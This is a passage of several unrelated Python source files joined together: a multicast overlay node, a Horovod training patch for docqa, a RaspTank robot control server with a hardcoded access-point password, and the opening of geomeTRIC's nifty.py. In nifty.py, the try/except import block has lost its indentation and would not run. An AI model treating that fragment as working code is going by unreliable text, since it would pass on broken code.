            child = TimedOutObj(child_addr, self.childrens, CHILDREN_TIMEOUT)
            child.register()
            self.mcast_send(child_addr, YJOI, '')
        else:
            self.mcast_send(child_addr, NJOI, "\r\n".join(
                " ".join(str(part) for part in x.obj) for x in self.childrens))

    def dataLoop(self):
        """Forward every datagram received on the data port to all
        current children."""
        sock = socket(AF_INET, SOCK_DGRAM)
        sock.bind(('', DATA_PORT))
        while True:
            try:
                data, addr = sock.recvfrom(1024)
                print("DATA: ", data)
                for child in self.childrens:
                    sock.sendto(data, (child.obj[0], DATA_PORT))
            except KeyboardInterrupt:
                print()
                # close — bug fix: self.data_sock never existed; close
                # the socket this loop actually opened, and exit.
                sock.close()
                return

    def run(self):
        # Become root if nobody is, otherwise join the advertised root.
        root = self.getRoot()
        if root == ():
            if self.registerRoot():
                # This node is the root one
                # Must keep alive
                self.runRoot()
            else:
                root = self.getRoot()
        if root != ():
            self.registerNode(root)
        Thread(target=self.dataLoop).start()
        while True:
            try:
                data, addr = self.mcast_sock.recvfrom(1024)
                # Bug fix: decode before comparing with str constants.
                data = data.decode('UTF-8')
                type = data[:4]
                if type == RJOI:
                    child = next(
                        (x for x in self.childrens if x.obj == addr), None)
                    if child is None:
                        # Bug fix: was the undefined name childRegister().
                        self.registerChild(addr)
                    else:
                        # Known child: refresh its expiry and re-ack.
                        child.resetTimeout()
                        self.mcast_send(child.obj, YJOI, '')
            except KeyboardInterrupt:
                print()
                # close
                self.mcast_sock.close()
                return
# ----------------------------------------------------------------------
# Command-line entry point: parse the rendezvous-point address and start
# the multicast node thread.
# ----------------------------------------------------------------------
parser = OptionParser(usage='usage: %prog [options]')
parser.set_defaults(server="127.0.0.1")
parser.add_option("-s", action='store', type='string',
                  dest="server", help='Server IP address')
(options, args) = parser.parse_args()
# NOTE(review): the node itself also binds MCAST_PORT, so pointing -s at
# the local host may conflict with the rendezvous point — verify.
server = MC_Node((options.server, MCAST_PORT))
server.start()
|
horovod_patches.py | # Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from docqa import trainer
import horovod.tensorflow as hvd
import time
from os.path import join, relpath
from typing import List, Union
import numpy as np
import tensorflow as tf
from docqa.dataset import TrainingData
from docqa.evaluator import Evaluator, AysncEvaluatorRunner
from docqa.model import Model
from docqa.model_dir import ModelDir
from threading import Thread
def _build_train_ops(train_params):
    """ Bulid ops we should run during training, including learning, EMA, and summary ops

    Horovod variant: the optimizer is wrapped in hvd.DistributedOptimizer
    so gradients are averaged across ranks before being applied.

    Returns (loss, summary_tensor, train_opt, global_step, ema).
    """
    global_step = tf.get_variable('global_step', shape=[], dtype='int32',
                                  initializer=tf.constant_initializer(0), trainable=False)
    #global_step = tf.train.get_or_create_global_step()
    loss = tf.get_collection(tf.GraphKeys.LOSSES)
    if len(loss) == 0:
        raise RuntimeError("No losses found in losses collection")
    loss = tf.add_n(loss, name="loss")

    if len(tf.get_collection(tf.GraphKeys.SUMMARIES)) > 0:
        # Add any summaries client stored in SUMMARIES
        summary_tensor = tf.summary.merge([[tf.summary.tensor_summary("loss", loss)] +
                                           tf.get_collection(tf.GraphKeys.SUMMARIES)])
    else:
        summary_tensor = tf.summary.tensor_summary("loss", loss)

    train_objective = loss

    # Optional L2-style regularization, optionally weighted.
    regularizers = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
    if len(regularizers) > 0:
        regularization_loss = tf.add_n(regularizers, name="regularization_loss")
        if train_params.regularization_weight is not None:
            train_objective = train_objective + regularization_loss * train_params.regularization_weight
        else:
            train_objective = train_objective + regularization_loss
    else:
        regularization_loss = None

    opt = train_params.opt.get()
    # Average gradients across Horovod ranks before applying them.
    opt = hvd.DistributedOptimizer(opt)
    #train_opt = opt.apply_gradients(opt.compute_gradients(train_objective), global_step=global_step)
    train_opt = opt.minimize(train_objective, global_step=global_step)

    if train_params.ema is not None:
        # Maintain exponential moving averages of all trainable weights.
        ema = tf.train.ExponentialMovingAverage(decay=train_params.ema)
        ema_op = ema.apply(tf.trainable_variables())
        with tf.control_dependencies([train_opt]):
            # Run the old training op, then update the averages.
            train_opt = tf.group(ema_op)
    else:
        ema = None

    # Any collections starting with "monitor" are also added as summaries
    to_monitor = {}
    for col in tf.get_default_graph().get_all_collection_keys():
        if col.startswith("monitor"):
            v = tf.get_collection(col)
            if len(v) > 0:
                print("Monitoring: " + col)
                v = tf.add_n(v)
                to_monitor[col] = v

    if len(to_monitor) > 0:
        monitor_ema = tf.train.ExponentialMovingAverage(decay=train_params.monitor_ema, name="MonitorEMA",
                                                        zero_debias=True)
        train_opt = tf.group(train_opt, monitor_ema.apply(list(to_monitor.values())))
        summary_tensor = tf.summary.merge(
            [tf.summary.scalar(col, monitor_ema.average(v)) for col, v in to_monitor.items()] +
            [summary_tensor])

    # EMA for the loss and what we monitoring
    if train_params.loss_ema is not None:
        loss_ema = tf.train.ExponentialMovingAverage(decay=train_params.loss_ema, name="LossEMA", zero_debias=True)
        if regularization_loss is None:
            ema_op = loss_ema.apply([loss])
            train_opt = tf.group(train_opt, ema_op)
            ema_var = loss_ema.average(loss)
            summary_tensor = tf.summary.merge([tf.summary.scalar("training-ema/loss", ema_var), summary_tensor])
        else:
            to_track = [loss, train_objective, regularization_loss]
            ema_op = loss_ema.apply(to_track)
            train_opt = tf.group(train_opt, ema_op)
            tensor_vars = [
                tf.summary.scalar("training-ema/loss", loss_ema.average(loss)),
                tf.summary.scalar("training-ema/objective", loss_ema.average(train_objective)),
                tf.summary.scalar("training-ema/regularization-loss",
                                  loss_ema.average(regularization_loss))
            ]
            summary_tensor = tf.summary.merge([tensor_vars, summary_tensor])

    return loss, summary_tensor, train_opt, global_step, ema
def _train(model: Model,
           data: TrainingData,
           checkpoint: Union[str, None],
           parameter_checkpoint: Union[str, None],
           save_start: bool,
           train_params: trainer.TrainParams,
           evaluators: List[Evaluator],
           out: ModelDir,
           notes=None,
           dry_run=False,
           start_eval=False):
    """Horovod-aware replacement for docqa.trainer._train.

    Only the asynchronous (queue-fed) encoding path is implemented;
    synchronous training raises NotImplementedError.
    """
    print('Horovod size: ', hvd.size())
    print('Horovod rank: ', hvd.rank())
    print('Horovod local rank: ', hvd.local_rank())
    if train_params.async_encoding:
        _train_async(model, data, checkpoint, parameter_checkpoint, save_start, train_params,
                     evaluators, out, notes, dry_run, start_eval)
        return
    else:
        raise NotImplementedError('Syncronous training with Horovod not supported yet')
def _train_async(model: Model,
                 data: TrainingData,
                 checkpoint: Union[str, None],
                 parameter_checkpoint: Union[str, None],
                 save_start: bool,
                 train_params: trainer.TrainParams,
                 evaluators: List[Evaluator],
                 out: ModelDir,
                 notes=None,
                 dry_run=False,
                 start_eval=False):
    """ Train while encoding batches on a seperate thread and storing them in a tensorflow Queue, can
    be much faster then using the feed_dict approach

    Horovod-aware: each rank pins its own GPU, gradients are averaged by
    the DistributedOptimizer built in _build_train_ops, and only rank 0
    writes summaries and checkpoints.

    Bug fixes relative to the previous revision:
      * restoring from ``parameter_checkpoint`` restored ``checkpoint``
      * the best-weights list was appended to while being iterated
    """
    train = data.get_train()
    eval_datasets = data.get_eval()
    loader = data.get_resource_loader()

    print("Training on %d batches" % len(train))
    print("Evaluation datasets: " + " ".join("%s (%d)" % (name, len(data)) for name, data in eval_datasets.items()))

    # spec the model for the given datasets
    model.set_inputs([train] + list(eval_datasets.values()), loader)
    placeholders = model.get_placeholders()

    # Queue filled by the encoder thread and drained by the train step.
    train_queue = tf.FIFOQueue(train_params.async_encoding, [x.dtype for x in placeholders], name="train_queue")
    evaluator_runner = AysncEvaluatorRunner(evaluators, model, train_params.async_encoding)
    train_enqeue = train_queue.enqueue(placeholders)
    train_close = train_queue.close(True)

    # Select the input pipeline (train queue vs. eval queue) at run time.
    is_train = tf.placeholder(tf.bool, ())
    input_tensors = tf.cond(is_train, lambda: train_queue.dequeue(),
                            lambda: evaluator_runner.eval_queue.dequeue())

    # tensorfow can't infer the shape for an unsized queue, so set it manually
    for input_tensor, pl in zip(input_tensors, placeholders):
        input_tensor.set_shape(pl.shape)

    # Broadcast rank 0's initial variables to all other ranks.
    bcast = hvd.broadcast_global_variables(0)

    print("Init model...")
    config = tf.ConfigProto(allow_soft_placement=True)
    config.gpu_options.allow_growth = True
    # Pin each Horovod rank to its own GPU.
    config.gpu_options.visible_device_list = str(hvd.local_rank())
    sess = tf.Session(config=config)
    with sess.as_default():
        pred = model.get_predictions_for(dict(zip(placeholders, input_tensors)))
    evaluator_runner.set_input(pred)

    if parameter_checkpoint is not None:
        print("Restoring parameters from %s" % parameter_checkpoint)
        saver = tf.train.Saver()
        # Bug fix: previously restored `checkpoint` here, ignoring the
        # requested parameter checkpoint.
        saver.restore(sess, parameter_checkpoint)
        saver = None

    print("Setting up model prediction / tf...")
    all_vars = tf.global_variables()
    loss, summary_tensor, train_opt, global_step, weight_ema = _build_train_ops(train_params)

    # Pre-compute tensors we need at evaluations time
    eval_tensors = []
    for ev in evaluators:
        eval_tensors.append(ev.tensors_needed(pred))

    if train_params.best_weights is not None:
        lst = all_vars
        if weight_ema is not None:
            # Bug fix: iterate over a snapshot; appending to the list
            # being iterated would re-visit the newly added entries.
            for x in list(lst):
                v = weight_ema.average(x)
                if v is not None:
                    lst.append(v)
        best_weight_saver = tf.train.Saver(var_list=lst, max_to_keep=1)
        cur_best = None
    else:
        best_weight_saver = None
        cur_best = None

    saver = tf.train.Saver(max_to_keep=train_params.max_checkpoints_to_keep)
    summary_writer = tf.summary.FileWriter(out.log_dir)

    # Load or initialize the model parameters
    if checkpoint is not None:
        print("Restoring from checkpoint...")
        saver.restore(sess, checkpoint)
        print("Loaded checkpoint: " + str(sess.run(global_step)))
    else:
        print("Initializing parameters...")
        sess.run(tf.global_variables_initializer())
    # Synchronize initial weights across ranks.
    sess.run(bcast)

    # Make sure no bugs occur that add to the graph in the train loop, that can cause (eventuall) OOMs
    tf.get_default_graph().finalize()

    if dry_run:
        return

    on_step = sess.run(global_step)

    if save_start:
        # summary_writer.add_graph(sess.graph, global_step=on_step)
        if hvd.rank() == 0:
            trainer.save_train_start(out.dir, data, sess.run(global_step), evaluators, train_params, notes)

    def enqueue_train():
        """Encoder thread: dataset iterator -> encoder -> FIFO queue."""
        try:
            # feed data from the dataset iterator -> encoder -> queue
            for epoch in range(train_params.num_epochs):
                for batch in train.get_epoch():
                    feed_dict = model.encode(batch, True)
                    sess.run(train_enqeue, feed_dict)
        except tf.errors.CancelledError:
            # The queue_close operator has been called, exit gracefully
            return
        except Exception as e:
            # Crashes the main thread with a queue exception
            sess.run(train_close)
            raise e

    train_enqueue_thread = Thread(target=enqueue_train)
    train_enqueue_thread.daemon = True  # Ensure we exit the program on an excpetion

    print("Start training!")

    batch_time = 0
    train_dict = {is_train: True}
    eval_dict = {is_train: False}
    try:
        train_enqueue_thread.start()
        for epoch in range(train_params.num_epochs):
            for batch_ix in range(len(train)):
                t0 = time.perf_counter()
                on_step = sess.run(global_step) + 1
                get_summary = on_step % train_params.log_period == 0
                if get_summary:
                    summary, _, batch_loss = sess.run([summary_tensor, train_opt, loss], feed_dict=train_dict)
                else:
                    summary = None
                    _, batch_loss = sess.run([train_opt, loss], feed_dict=train_dict)
                if np.isnan(batch_loss):
                    raise RuntimeError("NaN loss!")
                batch_time += time.perf_counter() - t0
                # Only rank 0 writes summaries.
                if hvd.rank() == 0:
                    if summary is not None:
                        print("on epoch=%d batch=%d step=%d, time=%.3f" %
                              (epoch, batch_ix + 1, on_step, batch_time))
                        summary_writer.add_summary(
                            tf.Summary(value=[tf.Summary.Value(tag="time", simple_value=batch_time)]), on_step)
                        summary_writer.add_summary(summary, on_step)
                        batch_time = 0
                # occasional saving (rank 0 only)
                if hvd.rank() == 0:
                    if on_step % train_params.save_period == 0:
                        print("Checkpointing")
                        saver.save(sess, join(out.save_dir, "checkpoint-" + str(on_step)), global_step=global_step)
                # Occasional evaluation
                if (on_step % train_params.eval_period == 0) or start_eval:
                    print("Running evaluation...")
                    start_eval = False
                    t0 = time.perf_counter()
                    for name, data in eval_datasets.items():
                        n_samples = train_params.eval_samples.get(name)
                        evaluation = evaluator_runner.run_evaluators(sess, data, name, n_samples, eval_dict)
                        if hvd.rank() == 0:
                            for s in evaluation.to_summaries(name + "-"):
                                summary_writer.add_summary(s, on_step)
                            # Maybe save as the best weights
                            if train_params.best_weights is not None and name == train_params.best_weights[0]:
                                val = evaluation.scalars[train_params.best_weights[1]]
                                if cur_best is None or val > cur_best:
                                    print("Save weights with current best weights (%s vs %.5f)" % (
                                        "None" if cur_best is None else ("%.5f" % cur_best), val))
                                    best_weight_saver.save(sess, join(out.best_weight_dir, "best"),
                                                           global_step=global_step)
                                    cur_best = val
                    print("Evaluation took: %.3f seconds" % (time.perf_counter() - t0))
    finally:
        sess.run(train_close)  # terminates the enqueue thread with an exception
        train_enqueue_thread.join()
        saver.save(sess, relpath(join(out.save_dir, "checkpoint-" + str(on_step))), global_step=global_step)
        sess.close()
# Monkey-patch docqa.trainer so existing training entry points pick up
# the Horovod-aware implementations defined above.
trainer._build_train_ops = _build_train_ops
trainer._train = _train
trainer._train_async = _train_async
|
server.py | #!/usr/bin/env/python
# File name : server.py
# Production : RaspTank
# Website : www.adeept.com
# E-mail : support@adeept.com
# Author : William
# Date : 2018/08/22
import socket
import time
import threading
import move
import Adafruit_PCA9685
pwm = Adafruit_PCA9685.PCA9685()
pwm.set_pwm_freq(50)
pwm.set_all_pwm(0,300)
from rpi_ws281x import *
import argparse
import os
import ultra
import FPV
import psutil
import servo
import LED
import findline
# ---- shared state mutated by the command handlers below ----
step_set = 1
speed_set = 100           # motor speed
rad = 0.6                 # turning radius factor passed to move.move()
new_frame = 0
direction_command = 'no'  # 'forward' | 'backward' | 'no'
turn_command = 'no'       # 'left' | 'right' | 'no'
#pwm = Adafruit_PCA9685.PCA9685()
#pwm.set_pwm_freq(50)
pos_input = 1             # arm position step (1..17)
catch_input = 1           # gripper position step (1..13)
cir_input = 6             # camera pan position step (1..12)
# Feature-mode flags toggled by client commands.
ultrasonicMode = 0
FindLineMode = 0
FindColorMode = 0
def app_ctrl():
    """Control channel for the phone app: accept a TCP connection on
    port 10123 and translate newline-terminated commands into motor,
    servo and camera actions."""
    app_HOST = ''
    app_PORT = 10123
    app_BUFSIZ = 1024
    app_ADDR = (app_HOST, app_PORT)
    AppSerSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    AppSerSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    AppSerSock.bind(app_ADDR)

    def setup():
        # Initialise the motor driver.
        move.setup()

    def appCommand(data_input):
        """Dispatch one raw command string from the app."""
        global direction_command, turn_command, pos_input, catch_input, cir_input
        # ---- driving ----
        if data_input == 'forwardStart\n':
            direction_command = 'forward'
            move.move(speed_set, direction_command, turn_command, rad)
        elif data_input == 'backwardStart\n':
            direction_command = 'backward'
            move.move(speed_set, direction_command, turn_command, rad)
        elif data_input == 'leftStart\n':
            turn_command = 'left'
            move.move(speed_set, direction_command, turn_command, rad)
        elif data_input == 'rightStart\n':
            turn_command = 'right'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'forwardStop' in data_input:
            direction_command = 'no'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'backwardStop' in data_input:
            direction_command = 'no'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'leftStop' in data_input:
            turn_command = 'no'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'rightStop' in data_input:
            turn_command = 'no'
            move.move(speed_set, direction_command, turn_command, rad)
        # ---- camera pan/tilt ----
        if data_input == 'lookLeftStart\n':
            if cir_input < 12:
                cir_input += 1
            servo.cir_pos(cir_input)
        elif data_input == 'lookRightStart\n':
            if cir_input > 1:
                cir_input -= 1
            servo.cir_pos(cir_input)
        elif data_input == 'downStart\n':
            servo.camera_ang('lookdown', 10)
        elif data_input == 'upStart\n':
            servo.camera_ang('lookup', 10)
        elif 'lookLeftStop' in data_input:
            pass
        elif 'lookRightStop' in data_input:
            pass
        elif 'downStop' in data_input:
            pass
        elif 'upStop' in data_input:
            pass
        # ---- arm and gripper ----
        if data_input == 'aStart\n':
            if pos_input < 17:
                pos_input += 1
            servo.hand_pos(pos_input)
        elif data_input == 'bStart\n':
            if pos_input > 1:
                pos_input -= 1
            servo.hand_pos(pos_input)
        elif data_input == 'cStart\n':
            if catch_input < 13:
                catch_input += 3
            servo.catch(catch_input)
        elif data_input == 'dStart\n':
            if catch_input > 1:
                catch_input -= 3
            servo.catch(catch_input)
        elif 'aStop' in data_input:
            pass
        elif 'bStop' in data_input:
            pass
        elif 'cStop' in data_input:
            pass
        elif 'dStop' in data_input:
            pass
        print(data_input)

    def appconnect():
        # Blocks until the app connects; publishes the client socket.
        global AppCliSock, AppAddr
        AppSerSock.listen(5)
        print('waiting for App connection...')
        AppCliSock, AppAddr = AppSerSock.accept()
        print('...App connected from :', AppAddr)

    appconnect()
    setup()
    # NOTE(review): appconnect() was just called synchronously above;
    # starting it again on a thread re-accepts and replaces AppCliSock —
    # confirm this double start is intended.
    app_threading = threading.Thread(target=appconnect)  # Define a thread for FPV and OpenCV
    app_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
    app_threading.start()  # Thread starts
    while 1:
        data = ''
        data = str(AppCliSock.recv(app_BUFSIZ).decode())
        if not data:
            continue
        appCommand(data)
        pass
# Launch the app-control server on a daemon thread so it exits with main.
AppConntect_threading = threading.Thread(target=app_ctrl)  # Define a thread for FPV and OpenCV
AppConntect_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
AppConntect_threading.start()  # Thread starts
def findline_thread():  # Line tracking mode
    """Background worker: run the line follower while FindLineMode is
    set, polling the flag every 0.2 s otherwise."""
    while True:
        while FindLineMode:
            findline.run()
        time.sleep(0.2)
def get_cpu_tempfunc():
    """ Return CPU temperature """
    temp_path = "/sys/class/thermal/thermal_zone0/temp"
    raw = 0
    with open(temp_path, 'r') as fh:
        for text_line in fh:
            raw = text_line  # keep the file's last (only) line
    # Kernel reports millidegrees Celsius; convert and round to 0.1 C.
    return str(round(float(raw) / 1000, 1))
def get_gpu_tempfunc():
    """ Return GPU temperature as a character string"""
    # vcgencmd prints e.g. "temp=45.0'C"; strip the prefix only.
    line = os.popen('/opt/vc/bin/vcgencmd measure_temp').readline()
    return line.replace("temp=", "")
def get_cpu_use():
    """ Return CPU usage using psutil"""
    return str(psutil.cpu_percent())
def get_ram_info():
    """ Return RAM usage using psutil """
    # Index 2 of virtual_memory() is the used-percentage field.
    return str(psutil.virtual_memory()[2])
def get_swap_info():
    """ Return swap memory usage using psutil """
    # Index 3 of swap_memory() is the used-percentage field.
    return str(psutil.swap_memory()[3])
def info_get():
    """Background worker: refresh the cached system stats every 3 s."""
    global cpu_t, cpu_u, gpu_t, ram_info
    while 1:
        cpu_t = get_cpu_tempfunc()
        cpu_u = get_cpu_use()
        ram_info = get_ram_info()
        # NOTE(review): gpu_t is declared global but never assigned here.
        time.sleep(3)
def info_send_client():
    """Push "cpu_temp cpu_use ram_use" to the client once per second.

    NOTE(review): depends on the module-level ``addr`` set in __main__
    after the control connection is accepted — confirm start ordering.
    """
    SERVER_IP = addr[0]
    SERVER_PORT = 2256  # Define port serial
    SERVER_ADDR = (SERVER_IP, SERVER_PORT)
    Info_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # Set connection value for socket
    Info_Socket.connect(SERVER_ADDR)
    print(SERVER_ADDR)
    while 1:
        try:
            Info_Socket.send((get_cpu_tempfunc() + ' ' + get_cpu_use() + ' ' + get_ram_info()).encode())
            time.sleep(1)
        except:
            # best-effort: keep looping even if the client drops
            pass
def ultra_send_client():
    """Stream ultrasonic distance readings to the client while
    ultrasonicMode is active; in FindColor mode feed them to the FPV
    pipeline instead.

    NOTE(review): depends on the module-level ``addr`` and ``fpv`` set in
    __main__ — confirm start ordering.
    """
    ultra_IP = addr[0]
    ultra_PORT = 2257  # Define port serial
    ultra_ADDR = (ultra_IP, ultra_PORT)
    ultra_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # Set connection value for socket
    ultra_Socket.connect(ultra_ADDR)
    print(ultra_ADDR)
    while 1:
        while ultrasonicMode:
            try:
                if not FindColorMode:
                    ultra_Socket.send(str(round(ultra.checkdist(), 2)).encode())
                    time.sleep(0.5)
                    continue
                fpv.UltraData(round(ultra.checkdist(), 2))
                time.sleep(0.2)
            except:
                # best-effort: sensor/socket glitches are ignored
                pass
        time.sleep(0.5)
def FPV_thread():
    """Run the OpenCV/FPV video capture loop, streaming to the client."""
    fpv = FPV.FPV()
    # NOTE(review): this local shadows the module-level ``fpv`` created in
    # __main__, so mode commands in run() act on a different instance —
    # verify this is intended.
    fpv.capture_thread(addr[0])
def ap_thread():
    """Fallback when no network is reachable: start a WiFi access point."""
    os.system("sudo create_ap wlan0 eth0 AdeeptCar 12345678")
def run():
    """Main TCP command loop: read commands from the PC client socket
    (``tcpCliSock`` from __main__) and drive motors, servos, LEDs and the
    camera feature modes."""
    global direction_command, turn_command, pos_input, catch_input, cir_input, ultrasonicMode, FindLineMode, FindColorMode
    move.setup()
    findline.setup()
    # Background reporter/worker threads (all daemons).
    info_threading = threading.Thread(target=info_send_client)  # Define a thread for FPV and OpenCV
    info_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
    info_threading.start()  # Thread starts
    ultra_threading = threading.Thread(target=ultra_send_client)  # Define a thread for FPV and OpenCV
    ultra_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
    ultra_threading.start()  # Thread starts
    findline_threading = threading.Thread(target=findline_thread)  # Define a thread for FPV and OpenCV
    findline_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
    findline_threading.start()  # Thread starts
    #move.stand()
    ws_R = 0
    ws_G = 0
    ws_B = 0
    Y_pitch = 0
    Y_pitch_MAX = 200
    Y_pitch_MIN = -200
    while True:
        data = ''
        data = str(tcpCliSock.recv(BUFSIZ).decode())
        if not data:
            continue
        # ---- driving ----
        elif 'forward' == data:
            direction_command = 'forward'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'backward' == data:
            direction_command = 'backward'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'DS' in data:
            direction_command = 'no'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'left' == data:
            turn_command = 'left'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'right' == data:
            turn_command = 'right'
            move.move(speed_set, direction_command, turn_command, rad)
        elif 'TS' in data:
            turn_command = 'no'
            move.move(speed_set, direction_command, turn_command, rad)
        # ---- arm / camera servos ----
        elif 'out' == data:
            if pos_input < 17:
                pos_input += 1
            servo.hand_pos(pos_input)
        elif 'in' == data:
            if pos_input > 1:
                pos_input -= 1
            servo.hand_pos(pos_input)
        elif 'headup' == data:
            servo.camera_ang('lookup', 0)
        elif 'headdown' == data:
            servo.camera_ang('lookdown', 0)
        elif 'headhome' == data:
            servo.initPosAll()
        elif 'c_left' == data:
            if cir_input < 12:
                cir_input += 1
            servo.cir_pos(cir_input)
        elif 'c_right' == data:
            if cir_input > 1:
                cir_input -= 1
            servo.cir_pos(cir_input)
        elif 'catch' == data:
            if catch_input < 13:
                catch_input += 1
            servo.catch(catch_input)
        elif 'loose' == data:
            if catch_input > 1:
                catch_input -= 1
            servo.catch(catch_input)
        # ---- LED colour channels, e.g. "wsR 255" ----
        elif 'wsR' in data:
            try:
                set_R = data.split()
                ws_R = int(set_R[1])
                LED.colorWipe(ws_R, ws_G, ws_B)
            except:
                pass
        elif 'wsG' in data:
            try:
                set_G = data.split()
                ws_G = int(set_G[1])
                LED.colorWipe(ws_R, ws_G, ws_B)
            except:
                pass
        elif 'wsB' in data:
            try:
                set_B = data.split()
                ws_B = int(set_B[1])
                LED.colorWipe(ws_R, ws_G, ws_B)
            except:
                pass
        # ---- feature modes (acknowledged back to the client) ----
        elif 'FindColor' in data:
            fpv.FindColor(1)
            FindColorMode = 1
            ultrasonicMode = 1
            tcpCliSock.send(('FindColor').encode())
        elif 'WatchDog' in data:
            fpv.WatchDog(1)
            tcpCliSock.send(('WatchDog').encode())
        elif 'steady' in data:
            ultrasonicMode = 1
            tcpCliSock.send(('steady').encode())
        elif 'FindLine' in data:
            FindLineMode = 1
            tcpCliSock.send(('FindLine').encode())
        elif 'funEnd' in data:
            # Leave every feature mode and stop the motors.
            fpv.FindColor(0)
            fpv.WatchDog(0)
            ultrasonicMode = 0
            FindLineMode = 0
            FindColorMode = 0
            tcpCliSock.send(('FunEnd').encode())
            move.motorStop()
            time.sleep(0.3)
            move.motorStop()
        else:
            pass
        #print(data)
if __name__ == '__main__':
    HOST = ''
    PORT = 10223  # Define port serial
    BUFSIZ = 1024  # Define buffer size
    ADDR = (HOST, PORT)
    pwm.set_all_pwm(0, 300)
    try:
        # NOTE(review): rebinding LED from the module to an instance
        # shadows the imported LED module from here on — verify.
        LED = LED.LED()
        LED.colorWipe(255, 16, 0)
    except:
        print('Use "sudo pip3 install rpi_ws281x" to install WS_281x package')
        pass
    while 1:
        # Check for internet connectivity; if unreachable, fall back to
        # access-point mode and show a blue LED ramp while it starts.
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("1.1.1.1", 80))
            ipaddr_check = s.getsockname()[0]
            s.close()
            print(ipaddr_check)
        except:
            ap_threading = threading.Thread(target=ap_thread)  # Define a thread for data receiving
            ap_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
            ap_threading.start()  # Thread starts
            LED.colorWipe(0, 16, 50)
            time.sleep(1)
            LED.colorWipe(0, 16, 100)
            time.sleep(1)
            LED.colorWipe(0, 16, 150)
            time.sleep(1)
            LED.colorWipe(0, 16, 200)
            time.sleep(1)
            LED.colorWipe(0, 16, 255)
            time.sleep(1)
            LED.colorWipe(35, 255, 35)
        try:
            # Accept the PC client, then start the FPV video thread.
            tcpSerSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            tcpSerSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            tcpSerSock.bind(ADDR)
            tcpSerSock.listen(5)  # Start server, waiting for client
            print('waiting for connection...')
            tcpCliSock, addr = tcpSerSock.accept()
            print('...connected from :', addr)
            fpv = FPV.FPV()
            fps_threading = threading.Thread(target=FPV_thread)  # Define a thread for FPV and OpenCV
            fps_threading.setDaemon(True)  # 'True' means it is a front thread, it would close when the mainloop() closes
            fps_threading.start()  # Thread starts
            break
        except:
            LED.colorWipe(0, 0, 0)
    try:
        LED.colorWipe(0, 80, 255)
    except:
        pass
    run()
    # NOTE(review): run() loops forever, so the block below is normally
    # unreachable; the second run() call looks accidental — verify.
    try:
        pwm.set_all_pwm(0, 0)
        run()
    except:
        LED.colorWipe(0, 0, 0)
        servo.clean_all()
        move.destroy()
|
nifty.py |
"""@package geometric.nifty Nifty functions, originally intended to be imported by any module within ForceBalance.
This file was copied over from ForceBalance to geomeTRIC in order to lighten the dependencies of the latter.
Table of Contents:
- I/O formatting
- Math: Variable manipulation, linear algebra, least squares polynomial fitting
- Pickle: Expand Python's own pickle to accommodate writing XML etree objects
- Commands for submitting things to the Work Queue
- Various file and process management functions
- Development stuff (not commonly used)
Named after the mighty Sniffy Handy Nifty (King Sniffy)
@author Lee-Ping Wang
@date 2018-03-10
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import filecmp
import itertools
import distutils.dir_util
import os
import re
import shutil
import sys
from select import select
import numpy as np
from numpy.linalg import multi_dot
# For Python 3 compatibility
try:
from itertools import zip_longest as zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
import threading
from pickle import Pickler, Unpickler
import tarfile
import time
import subprocess
import math
import six # For six.string_types
from subprocess import PIPE
from collections import OrderedDict, defaultdict
#================================#
#       Set up the logger        #
#================================#
# Select the logging machinery based on which package this module was
# imported into (ForceBalance, geomeTRIC, or standalone).
if "forcebalance" in __name__:
    # If this module is part of ForceBalance, use the package level logger
    from .output import *
    package="ForceBalance"
else:
    from logging import *
    # Define two handlers that don't print newline characters at the end of each line
    class RawStreamHandler(StreamHandler):
        """
        Exactly like StreamHandler, except no newline character is printed at the end of each message.
        This is done in order to ensure functions in molecule.py and nifty.py work consistently
        across multiple packages.
        """
        def __init__(self, stream = sys.stdout):
            super(RawStreamHandler, self).__init__(stream)
        def emit(self, record):
            # Write the raw message with no trailing newline, then flush so
            # partial lines appear immediately.
            message = record.getMessage()
            self.stream.write(message)
            self.flush()
    class RawFileHandler(FileHandler):
        """
        Exactly like FileHandler, except no newline character is printed at the end of each message.
        This is done in order to ensure functions in molecule.py and nifty.py work consistently
        across multiple packages.
        """
        def __init__(self, *args, **kwargs):
            super(RawFileHandler, self).__init__(*args, **kwargs)
        def emit(self, record):
            # FileHandler may defer opening the stream; open it on first use.
            if self.stream is None:
                self.stream = self._open()
            message = record.getMessage()
            self.stream.write(message)
            self.flush()
    if "geometric" in __name__:
        # This ensures logging behavior is consistent with the rest of geomeTRIC
        logger = getLogger(__name__)
        logger.setLevel(INFO)
        package="geomeTRIC"
    else:
        # Standalone use: log to stdout without trailing newlines.
        logger = getLogger("NiftyLogger")
        logger.setLevel(INFO)
        handler = RawStreamHandler()
        logger.addHandler(handler)
        if __name__ == "__main__":
